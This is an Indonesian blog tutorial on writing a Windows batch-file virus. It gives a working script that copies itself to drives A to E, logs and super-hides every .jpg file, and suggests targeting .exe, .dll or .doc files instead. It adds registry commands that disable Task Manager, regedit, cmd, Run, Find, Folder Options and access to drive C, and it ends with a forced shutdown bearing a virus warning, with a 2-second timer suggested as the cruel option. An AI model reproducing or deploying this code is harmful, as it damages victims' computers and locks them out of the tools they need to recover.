Belajar membuat virus .bat dari nol

dari judul nya, file nya akan berekstensi .bat !!

biar nanti nya engga ribet,, kenapa begini ? kenapa begitu ?
di baca dulu ya perintah perintah internal dan eksternal yang dapat di eksekusi secara langsung dari DOS atau command Prompt
contoh perintah internal
PERINTAH - FUNGSI
cls - membersihkan layar
cd - memanggil direktori
dir - menampilkan isi direktori atau drive
copy - menyalin file
del - menghapus file
ren - mengganti nama file
md - membuat direktori baru
rd - menghapus direktori
date - menampilkan dan mengatur tanggal
time - menampilkan dan mengatur waktu
echo - mencetak string



perintah eksternal
perintah - fungsi
format - memformat partisi atau drive
unformat - merecover partisi atau disc yang terformat
undelete - merecover file yang terhapus
attrib - mengatur attribut file
edit - membuat atau mengedit file
label - menentukan label disk
tree - menampilkan direktori beserta sub-subnya
deltree - menghapus direktori beserta sub-subnya
xcopy - menyalin satu direktori utuh
chkdsk - melakukan pengecekan pada disk
scandisk - mendiagnosa permasalahan pada disk
move - memindahkan file
sekarang apa ? ok..
kita perlu membuat algoritma serangan virus terlebih dahulu sebelum kita menuliskan listing programnya.. (silahkan kreasikan mau agan agan gimana )
ane cuma mau ngasih yang kaya gini (sederhana banget), kalo agan punya ide silahkan tambahin atau kurang kurangin

echo off > c:\windows\data.txt
for %%p in (a b c d e) do copy %0 %%p:
for %%q in (a b c d e) do dir %%q:\*.jpg /B /S >> C:\windows\data.txt
for %%r in (a b c d e) do attrib +h +s %%r:\*.jpg /s
exit
nah perintah perintah itu apa guna nya ??
for %%p in (a b c d e) do copy %0 %%p:
perintah itu digunakan untuk melakukan pengcopyan file virus dengan nama yang sama dengan file virus aslinya ke drive A B C D E .

for %%q in (a b c d e) do dir %%q:\*.jpg /B /S >> C:\windows\data.txt
pada algoritma kedua ini, kita akan melakukan pendataan untuk file berekstensi *.jpg yang ada di drive A B C D E hasil pendataan ini kemudian akan di tampilkan di dalam file data.txt yang terletak di c:\windows ..

nah terus maksud dari /B itu apa ?
nah maksudnya dari /B itu setelah perintah dir adalah untuk menghilangkan tampilan header yang biasa muncur setiap kita menggunakan perintah Dir..

sedangkan perintah /S itu apa?
/S berfungsi agar pencarian file di lakukan hingga ke dalam subdirektori..

for %%r in (a b c d e) do attrib +h +s %%r:\*.jpg /s
setelah melakukan proses pendataan, selanjutnya yang akan di lakukan adalah menyembunyikan file file berekstensi *.jpg.. penyembunyian ini tidak dalam mode hidden, tetapi dalam mode super hidden..

penulisan +h dan +s setelah attrib di tujukan untuk memasang attribut hidden dan sistem file pada semua file *.jpg

tuliskan perintah di atas dalam notepad, kemudian simpan dengan nama terserahagan.bat

itu contoh nya ane mau ngehide file ekstensi *.jpg gan..
kalo agan mau, agan bisa ganti jadi *.exe *.dll *.doc terserah agan maunya apa

ok, nih ane bantuin buat nyalurin ide ide agan
tinggal agan tambahin ke situ notepad aja..

ok ada sedikit cara buat memanipulasi register nih bro


REG ADD HKCU\Software\Microsoft\windows\Currentversion\Exp lorer Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f
yang di atas itu berguna apabila sebelumnya anda telah melakukan konfigurasi pada folder option untuk menampilkan file file berartibut sistem file, maka kali ini pengaturan anda tersebut telah di rubah oleh virus. sehingga file file berartibut sistem file tidak lagi di tampakan..

REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies /v NoFolderOptions /t REG_DWORD /d 1 /f
dengan ini, pilihan folder options pada menu tools di windows explorer tidak lagi tersedia A.K.A dihilangkan

REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies /v DisableTaskMgr /t REG_DWORD /d 1 /f
ketika anda mecoba membuka task manager melalui kombinasi tombol ctrl+alt+del maka tidak akan ada reaksi apapun dari windows. begitu pula dengan cara yang lainnya, yaitu melalui klik kanan pada start menu bar, maka pilihan task manager tidak dapat di gunakan.

REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies Explorer /v NoFind /t REG_DWORD /d 1 /f
hilangnya fasilitas search / find dari start menu selain itu, agan juga tidak dapat menggunakan akses lain menuju fasilitas search di antaranya adalah dengan menggunakan kombinasi tombol windows + F , dan melalui fasilitas search di windows explorer


REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies Explorer /v NoRun /t REG_DWORD /d 1 /f
hilangnya fasilitas run pada start menu, agan juga tidak dapat lagi menggunakan kombinasi tombol windows + R untuk mengakses kontak dialog run..

REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f

drive C kini lagi tidak dapat dibuka, selalu muncul pesan larangan setiap drive C di akses..

REG ADD HKCU\Software\Policies\Microsoft\windows\System /v DisableCMD /t REG_DWORD /d 2 /f
command frompt tidak dapat lagi di gunakan , namun file batch masih bisa berjalan dengan normal

REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies System /v DisableRegistryTools /t REG_DWORD /d 1 /f
regedit kini sudah tidak dapat di akses lagi, setiap anda mengakses dari mana saja, maka akan muncul kotak larangan yang intinya meminta anda untuk menghubungi administrator komputer anda..

Shutdown -s -t 60 -c "Virus menyerang komputer anda" -f
setelah file virus di jalankan atau otomatis berjalan pada startup maka akan kotak dialog yang menghitung mundur dari detik ke 60 sebelum komputer di paksa shutdown pada kotak dialog tersebut juga akan muncul pesan "VIRUS MENYERANG KOMPUTER ANDA" atau pesan pesan lain, sesuai dengan yang anda tulis pada perintah shutdown..

itu waktu shutdown nya -t 60 detik,, agan bisa setting sendiri ..
kalo kejam sih boleh aja -t 02

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Reader

Translate

Powered by Blogger.